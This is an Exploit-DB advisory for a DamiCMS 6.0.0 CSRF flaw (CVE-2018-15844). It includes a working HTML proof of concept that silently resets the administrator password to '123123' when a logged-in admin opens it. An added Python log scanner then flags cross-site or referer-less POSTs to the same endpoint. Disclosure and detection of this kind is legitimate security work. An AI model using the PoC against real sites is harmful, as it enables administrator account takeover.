DamiCMS 6.0.0 – Cross-Site Request Forgery (Change Admin Password)

  • Author: Autism_JH
    Date: 2018-08-31
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/45314/
  • # Exploit Title: DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)
    # Author: Autism_JH
    # Date: 2018-08-30
    # Vendor Homepage: https://github.com/731276192/damicms
    # Software Link: https://github.com/731276192/damicms
    # Version: 6.0.0
    # CVE: CVE-2018-15844
    
    # Description:
    # DamiCMS v6.0.0 allows CSRF to change the administrator account's password.
    # After the administrator logs in and opens the PoC, the administrator account's
    # password will be changed to 123123.
    
    # POC:
    <html>
    <!-- CSRF PoC - generated by Burp Suite Professional -->
    	<body>
    		<script>history.pushState('', '', '/')</script>
    		<form action="http://Target/dami/admin.php?s=/Admin/doedit" method="POST">
    			<input type="hidden" name="username" value="admin" />
    			<input type="hidden" name="password" value="123123" />
    			<input type="hidden" name="role&#95;id" value="1" />
    			<input type="hidden" name="id" value="1" />
    			<input type="hidden" name="Submit" value="ç&#161;&#174;å&#174;&#154;ä&#191;&#174;æ&#148;&#185;" />
    			<input type="submit" value="Submit request" />
    		</form>
    	</body>
    </html>
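For defenders, the following added example (not part of the original advisory or of DamiCMS) scans web-server access logs for POSTs to the `s=/Admin/doedit` action from the PoC whose Referer is missing or points at another host. It assumes the Apache/nginx "combined" log format; the log lines, IP address, the `s=/Admin/edit/id/1` referring page and the host names `cms.example` and `other.example` are constructed placeholders.

```python
import re
from urllib.parse import urlsplit

# Combined log format: ip - user [time] "METHOD uri PROTO" status bytes "referer" "ua"
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)"'
)
# Endpoint taken from the PoC's form action.
SENSITIVE = "s=/Admin/doedit"

def suspicious_posts(lines, site_host):
    """Return (timestamp, ip, reason) for POSTs to the account-edit action
    whose Referer is missing or points at another host."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "POST" or SENSITIVE not in m["uri"]:
            continue
        ref = m["referer"]
        # history.pushState in the PoC only rewrites the path of the hosting
        # page, so the Referer still carries the foreign origin (or is absent
        # when a no-referrer policy is in effect). Both cases are flagged.
        if ref in ("", "-"):
            hits.append((m["ts"], m["ip"], "no referer"))
            continue
        host = (urlsplit(ref).hostname or "").lower()
        if host != site_host.lower():
            hits.append((m["ts"], m["ip"], "cross-site referer: " + host))
    return hits

# Constructed sample log lines (not from the advisory); hosts are placeholders.
SAMPLE = [
    '198.51.100.7 - - [31/Aug/2018:10:01:02 +0000] "POST /dami/admin.php?s=/Admin/doedit HTTP/1.1" 200 512 "http://cms.example/dami/admin.php?s=/Admin/edit/id/1" "Mozilla/5.0"',
    '198.51.100.7 - - [31/Aug/2018:10:05:40 +0000] "POST /dami/admin.php?s=/Admin/doedit HTTP/1.1" 200 512 "http://other.example/" "Mozilla/5.0"',
    '198.51.100.7 - - [31/Aug/2018:10:06:11 +0000] "POST /dami/admin.php?s=/Admin/doedit HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [31/Aug/2018:10:07:00 +0000] "GET /dami/admin.php?s=/Admin/index HTTP/1.1" 200 900 "http://cms.example/dami/admin.php" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_posts(SAMPLE, "cms.example"):
        print(hit)
```

A hit is a lead for review rather than proof of compromise, since privacy tools and referrer policies can also strip the Referer from legitimate requests.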